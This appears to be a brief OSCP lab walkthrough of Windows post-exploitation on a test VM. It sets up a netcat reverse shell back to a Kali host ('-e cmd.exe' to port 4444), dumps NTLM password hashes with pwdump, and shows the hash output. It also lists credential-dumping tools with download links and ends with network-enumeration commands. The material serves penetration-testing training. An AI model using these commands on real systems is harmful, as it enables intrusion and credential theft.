OSCP Security Technology - Windows Post Exploitation

OSCP Security Technology - Windows Post Exploitation

Software stores in folder - C:/Users/IEUser/

• netcat-1.11 （Download: https://eternallybored.org/misc/netcat/）
• fgdump.exe （Download: https://sectools.org/tool/fgdump/）
• PwDump.exe (Download: https://www.openwall.com/passwords/windows-pwdump)
• wce.exe (Download: https://www.ampliasecurity.com/research/windows-credentials-editor/)

Create an account named hackme.

Go back to our Kali Linux

locate fgdump
locate wce

nc -nvlp 4444

Run nccat as administrator on Windows 7.

-nv 192.168.1.22 4444 -e cmd.exe

The connection is established now.

Get passwords using pwdump7.exe.

Save these passwords on Linux.

Administrator:500:NO PASSWORD*********************:FC525C9683E8FE067095BA2DDC971889:::                                            
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:::                                                    
IEUser:1000:NO PASSWORD*********************:FC525C9683E8FE067095BA2DDC971889:::                                                  
sshd:1001:NO PASSWORD*********************:NO PASSWORD*********************:::                                                    
sshd_server:1002:NO PASSWORD*********************:8D0A16CFC061C3359DB455D00EC27035:::                                             
hackme:1003:NO PASSWORD*********************:32ED87BDB5FDC5E9CBA88547376818D4::: 

Explore

route  print

arp -a

netstat -ano

dir /A